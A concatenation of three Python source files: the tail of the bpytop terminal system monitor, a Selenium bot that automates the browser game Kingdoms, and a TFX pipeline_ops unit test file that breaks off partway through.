cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
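# Worked example of the clean-up above: a model string of
# "Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz" takes the branch that picks the
# token before "CPU" and is reduced to "i7-6700K".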
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
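# Example of the fallback path: with CORES = 4, THREADS = 8 and no readable
# /proc/cpuinfo, threads are mapped round-robin to core ids [0, 1, 2, 3, 0, 1, 2, 3].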
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
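# Usage sketch (illustrative, coordinates are 1-based terminal positions):
#   Draw.now(create_box(x=1, y=1, width=40, height=10, title="cpu"))
# draws a 40x10 box titled "cpu" in the top-left corner of the terminal.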
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scale a value up in steps of 1024 to the highest possible unit and return a string with the unit suffixed
* bit=True to use bit units, defaults to byte units
* per_second=True to append "/s" (or "ps" for bit units)
* start=int to set the 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens the unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
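# Worked example, assuming the UNITS table maps byte index 1 to "KiB":
#   floating_humanizer(1024)             -> "1.00 KiB"
#   floating_humanizer(1024, short=True) -> "1K" (0 decimals, 1-character unit)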
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
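# Worked examples:
#   units_to_bytes("10M")     -> 10 << 20 == 10485760 (10 MiB in bytes)
#   units_to_bytes("1.5Kbit") -> 192 (round(1.5 * 1024) bits / 8)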
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["H", "f1"]:
Menu.help()
elif key == "m":
if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
Box.view_mode = list(Box.view_modes)[0]
else:
Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
Draw.clear(saved=True)
Term.refresh(force=True)
elif key in box_keys:
boxes = CONFIG.shown_boxes.split()
if box_keys[key] in boxes:
boxes.remove(box_keys[key])
else:
boxes.append(box_keys[key])
CONFIG.shown_boxes = " ".join(boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
Term.refresh(force=True)
else:
found = False
if found: continue
if "proc" in Box.boxes:
if key in ["left", "right", "h", "l"]:
ProcCollector.sorting(key)
elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
if ProcBox.selected_pid in ProcCollector.collapsed:
ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "e":
CONFIG.proc_tree = not CONFIG.proc_tree
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "r":
CONFIG.proc_reversed = not CONFIG.proc_reversed
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key == "c":
CONFIG.proc_per_core = not CONFIG.proc_per_core
Collector.collect(ProcCollector, interrupt=True, redraw=True)
elif key in ["f", "F"]:
ProcBox.filtering = True
ProcCollector.case_sensitive = key == "F"
if not ProcCollector.search_filter: ProcBox.start = 0
Collector.collect(ProcCollector, redraw=True, only_draw=True)
elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
if psutil.pid_exists(pid):
if key == "T": sig = signal.SIGTERM
elif key == "K": sig = signal.SIGKILL
elif key == "I": sig = signal.SIGINT
try:
os.kill(pid, sig)
except Exception as e:
errlog.error(f'Exception when sending signal {sig} to pid {pid}')
errlog.exception(f'{e}')
elif key == "delete" and ProcCollector.search_filter:
ProcCollector.search_filter = ""
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key == "enter":
if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
ProcCollector.detailed = True
ProcBox.last_selection = ProcBox.selected
ProcBox.selected = 0
ProcCollector.detailed_pid = ProcBox.selected_pid
ProcBox.resized = True
Collector.proc_counter = 1
elif ProcCollector.detailed:
ProcBox.selected = ProcBox.last_selection
ProcBox.last_selection = 0
ProcCollector.detailed = False
ProcCollector.detailed_pid = None
ProcBox.resized = True
Collector.proc_counter = 1
else:
continue
ProcCollector.details = {}
ProcCollector.details_cpu = []
ProcCollector.details_mem = []
Graphs.detailed_cpu = NotImplemented
Graphs.detailed_mem = NotImplemented
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
ProcBox.selector(key, mouse_pos)
if "net" in Box.boxes:
if key in ["b", "n"]:
NetCollector.switch(key)
elif key == "z":
NetCollector.reset = not NetCollector.reset
Collector.collect(NetCollector, redraw=True)
elif key == "y":
CONFIG.net_sync = not CONFIG.net_sync
Collector.collect(NetCollector, redraw=True)
elif key == "a":
NetCollector.auto_min = not NetCollector.auto_min
NetCollector.net_min = {"download" : -1, "upload" : -1}
Collector.collect(NetCollector, redraw=True)
if "mem" in Box.boxes:
if key == "g":
CONFIG.mem_graphs = not CONFIG.mem_graphs
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "s":
Collector.collect_idle.wait()
CONFIG.swap_disk = not CONFIG.swap_disk
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "d":
Collector.collect_idle.wait()
CONFIG.show_disks = not CONFIG.show_disks
Collector.collect(MemCollector, interrupt=True, redraw=True)
elif key == "i":
Collector.collect_idle.wait()
CONFIG.io_mode = not CONFIG.io_mode
Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme
def main():
global THEME
Term.width = os.get_terminal_size().columns
Term.height = os.get_terminal_size().lines
#? Init -------------------------------------------------------------------------------------->
if DEBUG: TimeIt.start("Init")
#? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
#Term.refresh(force=True)
#? Start a thread checking for updates while running init
if CONFIG.update_check: UpdateChecker.run()
#? Draw banner and init status
if CONFIG.show_init and not Init.resized:
Init.start()
#? Load theme
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
try:
THEME = Theme(CONFIG.color_theme)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup boxes
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
try:
if CONFIG.check_temp: CpuCollector.get_sensors()
Box.calc_sizes()
Box.draw_bg(now=False)
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Setup signal handlers for SIGTSTP, SIGCONT, SIGINT and SIGWINCH
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
try:
signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
signal.signal(signal.SIGCONT, now_awake) #* Resume
signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for reading keyboard input
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
try:
if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
sys.stdin.reconfigure(errors="ignore") # type: ignore
Key.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Start a separate thread for data collection and drawing
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
try:
Collector.start()
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Collect data and draw to buffer
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
try:
Collector.collect(draw_now=False)
pass
except Exception as e:
Init.fail(e)
else:
Init.success()
#? Draw to screen
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
try:
Collector.collect_done.wait()
except Exception as e:
Init.fail(e)
else:
Init.success()
Init.done()
Term.refresh()
Draw.out(clear=True)
if CONFIG.draw_clock:
Box.clock_on = True
if DEBUG: TimeIt.stop("Init")
#? Main loop ------------------------------------------------------------------------------------->
def run():
while not False:
Term.refresh()
Timer.stamp()
while Timer.not_zero():
if Key.input_wait(Timer.left()):
process_keys()
Collector.collect()
#? Start main loop
try:
run()
except Exception as e:
errlog.exception(f'{e}')
clean_quit(1)
else:
#? Quit cleanly even if false starts being true...
clean_quit()
if __name__ == "__main__":
main()
|
king_bot.py
|
from .custom_driver import client
from .adventures import adventures_thread
from threading import Thread
import platform
import sys
import getopt
from .account import login
import time
from .util_game import close_welcome_screen
from .utils import log
from .farming import start_farming_thread, start_custom_farmlist_thread, sort_danger_farms_thread
from .dodge_attack import check_for_attack_thread
from .upgrade import upgrade_units_smithy_thread
from .settings import settings
from .celebration import celebration_thread
from .master_builders import master_builder_thread
#from .robber_hideouts import robber_hideout_thread
class king_bot:
def __init__(self, email: str, password: str, gameworld: str, proxy: str, start_args: list, debug: bool = False) -> None:
self.browser = client(debug=debug)
self.chrome_driver_path = settings.chromedriver_path
self.gameworld = gameworld
self.init(email=email, password=password,
proxy=proxy, start_args=start_args)
def init(self, email: str, password: str, proxy: str, start_args: list) -> None:
login_req = True
login_sleeptime = 0
manual_login = False
try:
opts, _ = getopt.getopt(
start_args[1:], "htrm:e:p:w:", ["email=", "password=", "gameworld="])
except:
print("error in arguments. check github for details.")
sys.exit()
for opt, arg in opts:
if opt == "-t":
# todo: run unit tests
# checks dependencies for travis
sys.exit()
elif opt == '-h':
self.browser.headless(self.chrome_driver_path, proxy=proxy)
elif opt == '-r':
self.browser.remote()
login_req = False
elif opt == '-m':
login_req = False
manual_login = True
login_sleeptime = int(arg)
elif opt in ("-e", "--email"):
email = arg
elif opt in ("-p", "--password"):
password = arg
elif opt in ("-w", "--gameworld"):
self.gameworld = arg
if self.browser.driver is None:
self.browser.chrome(self.chrome_driver_path, proxy=proxy)
if login_req:
if not email or not password or not self.gameworld:
# read login credentials
file = open(settings.credentials_path, "r")
lines = file.read().splitlines()
text = lines[0]
file.close()
if not self.gameworld:
self.gameworld = text.split(";")[0]
if not email:
email = text.split(";")[1]
if not password:
password = text.split(";")[2]
close = False
if not self.gameworld:
log("no gameworld provided")
close = True
if not email:
log("no email provided")
close = True
if not password:
log("no password provided")
close = True
if close:
sys.exit()
login(browser=self.browser, gameworld=self.gameworld,
email=email, password=password)
# clear login credentials
email = ""
password = ""
if manual_login:
self.browser.use()
self.browser.get('https://kingdoms.com')
time.sleep(login_sleeptime)
self.browser.done()
self.browser.use()
try:
close_welcome_screen(self.browser)
except:
pass
self.browser.done()
def start_adventures(self, interval: int = 100, health: int = 50) -> None:
Thread(target=adventures_thread, args=[
self.browser, interval, health]).start()
# todo implement
def upgrade_slot(self, village: int, slot: int) -> None:
log("upgrading slots is under construction - check for updates")
if slot > 19:
log("upgrading buildings is still under construction")
return
def start_farming(self, village: int, farmlists: list, interval: int) -> None:
Thread(target=start_farming_thread, args=[
self.browser, village, farmlists, interval]).start()
def start_custom_farmlist(self, reload: bool = False) -> None:
Thread(target=start_custom_farmlist_thread,
args=[self.browser, reload]).start()
def sort_danger_farms(self, farmlists: list, to_list: int, red: bool, yellow: bool, interval: int = 300) -> None:
Thread(target=sort_danger_farms_thread, args=[
self.browser, farmlists, to_list, red, yellow, interval]).start()
def dodge_attack(self, village: int, interval: int = 600, save_resources: bool = False, units: list = [], target: list = [], units_train: list = []) -> None:
# check dependencies for units
if units:
if not target:
log("please provide a target village to send your troops to for safekeeping")
return
# check dependencies for resources
if save_resources:
if not units_train:
log("please provide the units to train when saving resources")
return
Thread(target=check_for_attack_thread, args=[
self.browser, village, interval, units, target, save_resources, units_train]).start()
def upgrade_units_smithy(self, village: int, units: list, interval: int = 1000) -> None:
Thread(target=upgrade_units_smithy_thread, args=[
self.browser, village, units, interval]).start()
def celebrate(self, villages: list, interval: int = 1000) -> None:
# TODO implement type == 1 for big celebrations
celebration_type = 0
Thread(target=celebration_thread, args=[self.browser, villages, celebration_type, interval]).start()
def start_building(self, village: int, file_name: str, interval: int = 1800) -> None:
Thread(target=master_builder_thread, args=[
self.browser, village, file_name, interval]).start()
# def robber_hideout(self, interval: int = 600) -> None:
# Thread(target=robber_hideout_thread, args=[
# self.browser, interval]).start()
|
pipeline_ops_test.py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.experimental.core.pipeline_ops."""
import base64
import copy
import os
import threading
import time
from absl.testing.absltest import mock
import tensorflow as tf
from tfx.orchestration import metadata
from tfx.orchestration.experimental.core import async_pipeline_task_gen
from tfx.orchestration.experimental.core import pipeline_ops
from tfx.orchestration.experimental.core import status as status_lib
from tfx.orchestration.experimental.core import sync_pipeline_task_gen
from tfx.orchestration.experimental.core import task as task_lib
from tfx.orchestration.experimental.core import task_gen_utils
from tfx.orchestration.experimental.core import task_queue as tq
from tfx.orchestration.experimental.core import test_utils
from tfx.orchestration.portable.mlmd import execution_lib
from tfx.proto.orchestration import pipeline_pb2
from tfx.utils import test_case_utils as tu
from ml_metadata.proto import metadata_store_pb2
def _test_pipeline(pipeline_id,
execution_mode: pipeline_pb2.Pipeline.ExecutionMode = (
pipeline_pb2.Pipeline.ASYNC)):
pipeline = pipeline_pb2.Pipeline()
pipeline.pipeline_info.id = pipeline_id
pipeline.execution_mode = execution_mode
return pipeline
class PipelineOpsTest(tu.TfxTest):
def setUp(self):
super(PipelineOpsTest, self).setUp()
pipeline_root = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self.id())
# Makes sure multiple connections within a test always connect to the same
# MLMD instance.
metadata_path = os.path.join(pipeline_root, 'metadata', 'metadata.db')
self._metadata_path = metadata_path
connection_config = metadata.sqlite_metadata_connection_config(
metadata_path)
connection_config.sqlite.SetInParent()
self._mlmd_connection = metadata.Metadata(
connection_config=connection_config)
def test_initiate_pipeline_start(self):
with self._mlmd_connection as m:
# Initiate a pipeline start.
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Initiate another pipeline start.
pipeline2 = _test_pipeline('pipeline2')
pipeline_ops.initiate_pipeline_start(m, pipeline2)
# No error raised => context/execution types exist.
m.store.get_context_type(pipeline_ops._ORCHESTRATOR_RESERVED_ID)
m.store.get_execution_type(pipeline_ops._ORCHESTRATOR_RESERVED_ID)
# Verify MLMD state.
contexts = m.store.get_contexts_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(contexts, 2)
self.assertCountEqual([
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline1)),
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline2))
], [c.name for c in contexts])
for context in contexts:
executions = m.store.get_executions_by_context(context.id)
self.assertLen(executions, 1)
self.assertEqual(metadata_store_pb2.Execution.NEW,
executions[0].last_known_state)
retrieved_pipeline = pipeline_pb2.Pipeline()
retrieved_pipeline.ParseFromString(
base64.b64decode(executions[0].properties[
pipeline_ops._PIPELINE_IR].string_value))
expected_pipeline_id = (
pipeline_ops._pipeline_uid_from_context(context).pipeline_id)
self.assertEqual(
_test_pipeline(expected_pipeline_id), retrieved_pipeline)
def test_initiate_pipeline_start_new_execution(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Error if attempted to initiate when old one is active.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.initiate_pipeline_start(m, pipeline1)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
# Fine to initiate after the previous one is inactive.
executions = m.store.get_executions_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(executions, 1)
executions[0].last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions(executions)
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
self.assertEqual(metadata_store_pb2.Execution.NEW,
execution.last_known_state)
# Verify MLMD state.
contexts = m.store.get_contexts_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(contexts, 1)
self.assertEqual(
pipeline_ops._orchestrator_context_name(
task_lib.PipelineUid.from_pipeline(pipeline1)), contexts[0].name)
executions = m.store.get_executions_by_context(contexts[0].id)
self.assertLen(executions, 2)
self.assertCountEqual([
metadata_store_pb2.Execution.COMPLETE,
metadata_store_pb2.Execution.NEW
], [e.last_known_state for e in executions])
def test_initiate_pipeline_stop(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1)
pipeline_ops._initiate_pipeline_stop(m, pipeline_uid)
# Verify MLMD state.
executions = m.store.get_executions_by_type(
pipeline_ops._ORCHESTRATOR_RESERVED_ID)
self.assertLen(executions, 1)
execution = executions[0]
self.assertEqual(
1,
execution.custom_properties[pipeline_ops._STOP_INITIATED].int_value)
def test_stop_pipeline_non_existent(self):
with self._mlmd_connection as m:
# Stop pipeline without creating one.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid(pipeline_id='foo', pipeline_run_id=None))
self.assertEqual(status_lib.Code.NOT_FOUND,
exception_context.exception.code)
# Initiate pipeline start and mark it completed.
pipeline1 = _test_pipeline('pipeline1')
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline1)
pipeline_ops._initiate_pipeline_stop(m, pipeline_uid)
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
# Try to initiate stop again.
with self.assertRaises(status_lib.StatusNotOkError) as exception_context:
pipeline_ops.stop_pipeline(m, pipeline_uid)
self.assertEqual(status_lib.Code.ALREADY_EXISTS,
exception_context.exception.code)
def test_stop_pipeline_wait_for_inactivation(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
execution = pipeline_ops.initiate_pipeline_start(m, pipeline1)
def _inactivate(execution):
time.sleep(2.0)
with pipeline_ops._PIPELINE_OPS_LOCK:
execution.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution])
thread = threading.Thread(
target=_inactivate, args=(copy.deepcopy(execution),))
thread.start()
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=5.0)
thread.join()
def test_stop_pipeline_wait_for_inactivation_timeout(self):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
with self.assertRaisesRegex(
status_lib.StatusNotOkError,
'Timed out.*waiting for execution inactivation.'
) as exception_context:
pipeline_ops.stop_pipeline(
m, task_lib.PipelineUid.from_pipeline(pipeline1), timeout_secs=1.0)
self.assertEqual(status_lib.Code.DEADLINE_EXCEEDED,
exception_context.exception.code)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_generate_tasks_async_active_pipelines(self, mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
# One active pipeline.
pipeline1 = _test_pipeline('pipeline1')
pipeline_ops.initiate_pipeline_start(m, pipeline1)
# Another active pipeline (with previously completed execution).
pipeline2 = _test_pipeline('pipeline2')
execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2)
